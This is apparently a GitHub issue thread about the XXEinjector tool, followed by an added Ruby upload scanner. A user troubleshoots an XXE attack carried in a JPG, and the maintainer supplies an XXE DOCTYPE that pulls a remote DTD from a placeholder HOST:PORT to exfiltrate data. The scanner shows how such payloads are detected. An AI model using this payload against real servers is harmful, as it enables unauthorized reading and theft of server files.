enjoiz/XXEinjector

Support images with payload

JonathanJonathanJonathan opened this issue · 1 comments

I'm trying to perform an attack where a JPG contains the XXE payload. If I manually submit the picture it works, however XXEinjector fails:

/usr/share/ruby/uri/common.rb:331:in `gsub': invalid byte sequence in UTF-8 (ArgumentError)
        from /usr/share/ruby/uri/common.rb:331:in `unescape'
        from /usr/share/ruby/uri/common.rb:649:in `unescape'
        from XXEinjector.rb:370:in `block in configreq'
        from XXEinjector.rb:366:in `loop'
        from XXEinjector.rb:366:in `configreq'
        from XXEinjector.rb:1051:in `<main>'

I tried converting the request file to UTF-8; after that the tool performs an attack, but no connection to my server is made.

What should I do differently? Do you have a working example request that uses images?

Example Request:
req-example.txt

Example XXE JPG:
xxeinject

Keep up the good work, thanks! :)

Hello,

For such situations I have implemented the "--nodtd" switch. With it, the tool does not look for an injection point but just sends the request as it is to the server. In this case you need to specify the correct DTD in your request yourself.
You can see what it should look like using "--dtd" (replace only HOST and PORT):
<!DOCTYPE m [ <!ENTITY % remote SYSTEM "http://HOST:PORT/file.dtd">%remote;%int;%trick;]>

With "--nodtd", XXEinjector still waits for the reverse connection and does automatic retrieval; it only skips the automatic DTD injection part.

Please try it and let me know if it works. If so, please close the issue.
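
For the receiving side of the scenario in this thread, an added example (not part of the issue and not XXEinjector code): an upload check that flags image files whose bytes contain a DTD with an external entity, such as the DOCTYPE quoted above. It treats the file as binary throughout, since running a regex over image bytes tagged as UTF-8 is what produces the `invalid byte sequence in UTF-8` error in the trace. The names `scan_upload` and `SAMPLE_JPEG` are hypothetical and the sample bytes are constructed.

```ruby
# Added example: heuristic scan of an uploaded file for external-entity DTDs.
# Patterns are ASCII-only, so they can be matched against ASCII-8BIT strings.
DOCTYPE_RE = /<!DOCTYPE\s+[^\[>]*\[/
# Captures: optional "%" (parameter entity), entity name, system identifier.
EXT_ENT_RE = /<!ENTITY\s+(%\s+)?([\w.:-]+)\s+(?:SYSTEM|PUBLIC\s+["'][^"']*["'])\s+["']([^"']*)["']/

# bytes: raw file content in any encoding tag. Returns a findings hash.
def scan_upload(bytes)
  # String#b returns a binary-tagged copy, so every byte sequence is valid
  # and regex matching cannot raise on non-UTF-8 image data.
  data = bytes.b
  entities = data.scan(EXT_ENT_RE).map do |pct, name, uri|
    { kind: pct ? :parameter_entity : :general_entity, name: name, uri: uri }
  end
  {
    doctype: !!(data =~ DOCTYPE_RE),
    external_entities: entities,
    suspicious: !entities.empty?
  }
end

# Constructed sample: JPEG start/end markers around the DOCTYPE from the
# thread, with HOST and PORT left as the placeholders used there.
SAMPLE_JPEG = "\xFF\xD8\xFF\xE0".b +
  '<!DOCTYPE m [ <!ENTITY % remote SYSTEM "http://HOST:PORT/file.dtd">%remote;%int;%trick;]>'.b +
  "\xFF\xD9".b

if __FILE__ == $PROGRAM_NAME
  result = scan_upload(SAMPLE_JPEG)
  puts "doctype present: #{result[:doctype]}"
  result[:external_entities].each do |e|
    puts "#{e[:kind]} #{e[:name]} -> #{e[:uri]}"
  end
  puts "reject upload: #{result[:suspicious]}"
end
```

This is a byte-level heuristic only; the actual fix on the server is to configure the XML parser that processes uploads so that it does not load DTDs or resolve external entities.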